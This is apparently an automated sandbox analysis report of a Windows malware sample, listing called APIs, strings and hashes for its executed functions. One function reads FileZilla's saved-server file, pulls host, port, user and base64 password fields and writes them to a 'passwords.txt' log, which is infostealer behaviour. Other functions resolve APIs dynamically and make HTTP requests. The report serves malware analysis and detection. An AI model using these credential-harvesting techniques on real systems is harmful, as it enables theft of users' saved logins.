ff127a 59182->59183 59184 ff1316 59182->59184 59194 ff127e 59183->59194 59187 ff1320 59184->59187 59288 ff1d7e GetProcessHeap HeapFree 59184->59288 59287 ff1d7e GetProcessHeap HeapFree 59185->59287 59192 ffcab4 ___init_ctype 5 API calls 59187->59192 59188 ff12e3 59188->59187 59193 ff12ec wsprintfA 59188->59193 59195 ff133a 59192->59195 59193->59187 59194->59181 59196 ff130f 59194->59196 59285 ff1d7e GetProcessHeap HeapFree 59194->59285 59286 ff1d9b GetProcessHeap HeapAlloc 59194->59286 59195->58797 59196->59187 59198 ffcab4 ___init_ctype 5 API calls 59197->59198 59199 ff1228 59198->59199 59199->58811 59289 ff1d49 59200->59289 59203 ff1382 wsprintfA 59205 ffcab4 ___init_ctype 5 API calls 59203->59205 59206 ff13b3 59205->59206 59206->58825 59208 ff070a lstrcpyA 59207->59208 59210 ff13d6 59208->59210 59209 ff1416 59212 ffcab4 ___init_ctype 5 API calls 59209->59212 59210->59209 59211 ff076c 2 API calls 59210->59211 59211->59210 59213 ff1424 59212->59213 59213->58839 59215 ff070a lstrcpyA 59214->59215 59216 ff16e9 CreateToolhelp32Snapshot Process32First 59215->59216 59217 ff176f CloseHandle 59216->59217 59223 ff1711 59216->59223 59218 ffcab4 ___init_ctype 5 API calls 59217->59218 59220 ff1784 59218->59220 59219 ff175d Process32Next 59219->59217 59219->59223 59220->58853 59221 ff082c lstrlenA lstrcpyA lstrcatA 59221->59223 59222 ff07b0 lstrcpyA 59222->59223 59223->59219 59223->59221 59223->59222 59225 ff070a lstrcpyA 59224->59225 59226 ff145e RegOpenKeyExA 59225->59226 59227 ff169b 59226->59227 59243 ff14a4 59226->59243 59229 ff073c lstrcpyA 59227->59229 59228 ff14aa RegEnumKeyExA 59230 ff14e7 wsprintfA RegOpenKeyExA 59228->59230 59228->59243 59231 ff16ac 59229->59231 59233 ff152d RegQueryValueExA 59230->59233 59234 ff1683 RegCloseKey 59230->59234 59238 ffcab4 ___init_ctype 5 API calls 59231->59238 59232 ff1681 59235 ff168f RegCloseKey 59232->59235 59236 ff1663 RegCloseKey 59233->59236 59237 ff1563 lstrlenA 59233->59237 59234->59235 59235->59227 59236->59243 59237->59236 59237->59243 59239 ff16c6 59238->59239 59239->58867 59240 ff15d3 RegQueryValueExA 59240->59236 59240->59243 59241 ff082c lstrlenA lstrcpyA lstrcatA 59241->59243 59242 ff07b0 lstrcpyA 59242->59243 59243->59228 59243->59232 59243->59236 59243->59240 59243->59241 59243->59242 59245 ff7084 59244->59245 59246 ff07b0 lstrcpyA 59245->59246 59247 ff70a1 59246->59247 59248 ff07b0 lstrcpyA 59247->59248 59249 ff70bd 59248->59249 59250 ff07b0 lstrcpyA 59249->59250 59251 ff70c8 59250->59251 59252 ff07b0 lstrcpyA 59251->59252 59253 ff70d3 59252->59253 59254 ff70da Sleep 59253->59254 59255 ff70ea 59253->59255 59254->59253 59256 ff7106 CreateThread WaitForSingleObject 59255->59256 59291 ffc74e 51 API calls 59255->59291 59258 ff070a lstrcpyA 59256->59258 59292 ff6fa3 59256->59292 59260 ff712e 59258->59260 59259 ff7104 59259->59256 59260->58886 59262 10036bc 59261->59262 59262->59105 59262->59262 59266 ff0dcc GetProcessHeap HeapAlloc RegOpenKeyExA 59263->59266 59265 ff0d7b 59265->59120 59265->59121 59267 ff0e0f RegQueryValueExA 59266->59267 59268 ff0e26 RegCloseKey 59266->59268 59267->59268 59269 ff0e36 59268->59269 59269->59265 59270->59126 59282 100eb3d 59271->59282 59273 ff1986 CoCreateInstance 59274 ff19ae SysAllocString 59273->59274 59275 ff1a0a 59273->59275 59274->59275 59276 ff19bd 59274->59276 59275->59138 59277 ff1a03 SysFreeString 59276->59277 59278 ff19e1 _wtoi64 SysFreeString 59276->59278 59277->59275 59278->59277 59280 ffcab4 ___init_ctype 5 API calls 59279->59280 59281 ff1bb9 59280->59281 59281->58667 59282->59273 59283->59143 59284->59153 59285->59194 59286->59194 59287->59188 59288->59187 59290 ff1370 GlobalMemoryStatusEx 59289->59290 59290->59203 59291->59259 59302 100eb3d 59292->59302 59294 ff6faf lstrlenA 59295 ff6fc0 59294->59295 59299 ff6fcb 59294->59299 59296 ff073c lstrcpyA 59296->59299 59298 ff07b0 lstrcpyA 59298->59299 59299->59296 59299->59298 59300 ff7031 StrCmpCA 59299->59300 59303 fe5474 45 API calls 2 library calls 59299->59303 59300->59299 59301 ff7043 59300->59301 59301->59295 59302->59294 59303->59299 59438 fe84a1 11 API calls 59304->59438 59306 fe84ef 59306->58909 59308 ff284d WriteFile 59307->59308 59310 ff283f 59307->59310 59309 ff286f CloseHandle 59308->59309 59308->59310 59309->59310 59310->58913 59312 fe85b7 GetProcAddress GetProcAddress 59311->59312 59313 fe85b3 59311->59313 59314 fe85eb FreeLibrary 59312->59314 59315 fe85e7 59312->59315 59313->58942 59314->58942 59315->59313 59315->59314 59317 fee370 _memset 59316->59317 59318 fee3b2 RegOpenKeyExA 59317->59318 59319 fee3eb RegGetValueA 59318->59319 59322 fee86c 59318->59322 59320 fee43b 59319->59320 59321 fee418 59319->59321 59320->59321 59324 fee45d RegOpenKeyExA 59320->59324 59325 fee44b RegCloseKey 59320->59325 59321->59322 59323 fee424 RegCloseKey 59321->59323 59326 ffcab4 ___init_ctype 5 API calls 59322->59326 59323->59322 59324->59322 59327 fee47b RegEnumKeyExA 59324->59327 59325->59324 59328 fee881 59326->59328 59327->59321 59329 fee4a2 59327->59329 59328->58924 59330 ff070a lstrcpyA 59329->59330 59353 fee4b2 59330->59353 59331 fee50a RegGetValueA 59346 fee709 StrCmpCA 59346->59353 59348 ff07b0 lstrcpyA 59348->59353 59353->59331 59353->59346 59353->59348 59362 ff070a lstrcpyA 59361->59362 59363 fee89c 59362->59363 59432->58942 59433->58942 59434->58942 59438->59306

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00FEE883 Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00FEE932
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F,01015957,01015956,0101593B,01015937), ref: 00FEE978
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FEE97F
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FEE993
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FEE99E
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FEE9D2
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FEE9DD
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00FEEA0B
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FEEA16
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FEEA44
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FEEA4F
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FEEAB5
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FEEAC9
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00FEEECA), ref: 00FEEBF1
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                          • API String ID: 4146028692-935134978
                                                                                                                                                                                                                                                          • Opcode ID: d63e3469a0e183ca0753c7bfd8a85bce8ab50c5d31924b686071049c7a4bfb12
                                                                                                                                                                                                                                                          • Instruction ID: b8836e99889b0f3dbf12104240b0e7fb1c6907cb60b78f556c5f3eada528c545
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d63e3469a0e183ca0753c7bfd8a85bce8ab50c5d31924b686071049c7a4bfb12
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13A14F32940219AFCF40BBB2ED4A9DE7B79BF04700F404451F701BB126EBB96E05AB91
                                                                                                                                                                                                                                                          Function 00FF80C5 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1020 ff80c5-ff80d5 call ff801c 1023 ff80db-ff82c1 call fe7d39 GetProcAddress * 20 1020->1023 1024 ff82c6-ff8323 LoadLibraryA * 5 1020->1024 1023->1024 1025 ff8337-ff833e 1024->1025 1026 ff8325-ff8332 GetProcAddress 1024->1026 1028 ff8369-ff8370 1025->1028 1029 ff8340-ff8364 GetProcAddress * 2 1025->1029 1026->1025 1031 ff8384-ff838b 1028->1031 1032 ff8372-ff837f GetProcAddress 1028->1032 1029->1028 1034 ff839f-ff83a6 1031->1034 1035 ff838d-ff839a GetProcAddress 1031->1035 1032->1031 1036 ff83a8-ff83cc GetProcAddress * 2 1034->1036 1037 ff83d1 1034->1037 1035->1034 1036->1037
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8106
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF811D
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8134
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF814B
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8162
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8179
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8190
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF81A7
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF81BE
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF81D5
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF81EC
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8203
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF821A
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8231
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8248
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF825F
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8276
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF828D
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF82A4
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF82BB
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF82CC
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF82DD
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF82EE
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF82FF
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF8310
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(76850000,00FF7F44), ref: 00FF832C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(77040000,00FF7F44), ref: 00FF8347
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF835E
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75A10000,00FF7F44), ref: 00FF8379
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75690000,00FF7F44), ref: 00FF8394
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(776F0000,00FF7F44), ref: 00FF83AF
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF83C6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2238633743-0
                                                                                                                                                                                                                                                          • Opcode ID: 7b5ac824de335339d3cd64176e49ced1311683260defe9ca69f1ee0479914b24
                                                                                                                                                                                                                                                          • Instruction ID: 89523ef4004597e9b2390554cef00eed6348a8b226c812aa4e40c220a1117a6b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5ac824de335339d3cd64176e49ced1311683260defe9ca69f1ee0479914b24
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02710D75401616EFDBB25F64FA0D8663BB3F72C355384C526EB858262CE7724850EF41
                                                                                                                                                                                                                                                          Function 00FE6955 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1462 fe6955-fe69d9 call ff073c call fe4aa7 call ff070a InternetOpenA StrCmpCA 1469 fe69dc-fe69e2 1462->1469 1470 fe69db 1462->1470 1471 fe69e8-fe6a0e InternetConnectA 1469->1471 1472 fe6b60-fe6b6c call ff073c 1469->1472 1470->1469 1473 fe6b54-fe6b5a InternetCloseHandle 1471->1473 1474 fe6a14-fe6a4f HttpOpenRequestA 1471->1474 1478 fe6b71-fe6b9c call fe2910 * 3 call ffcab4 1472->1478 1473->1472 1476 fe6b48-fe6b4e InternetCloseHandle 1474->1476 1477 fe6a55-fe6a57 1474->1477 1476->1473 1480 fe6a59-fe6a6f InternetSetOptionA 1477->1480 1481 fe6a75-fe6aa6 HttpSendRequestA HttpQueryInfoA 1477->1481 1480->1481 1483 fe6abd-fe6acd call ff1d20 1481->1483 1484 fe6aa8 1481->1484 1491 fe6b9d-fe6ba2 1483->1491 1492 fe6ad3-fe6ad5 1483->1492 1486 fe6aad-fe6ab8 call ff070a 1484->1486 1486->1478 1491->1486 1495 fe6b3c-fe6b42 InternetCloseHandle 1492->1495 1496 fe6ad7-fe6adc 1492->1496 1495->1476 1498 fe6b1d-fe6b3a InternetReadFile 1496->1498 1498->1495 1501 fe6ade-fe6ae6 1498->1501 1501->1495 1502 fe6ae8-fe6b18 call ff082c call ff07b0 call fe2910 1501->1502 1502->1498
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE69B7
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FE69D1
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6A00
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00FE6A3F
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE6A6F
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE6A7A
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00FE6A9E
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 00FE6B32
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE6B42
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE6B4E
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE6B5A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
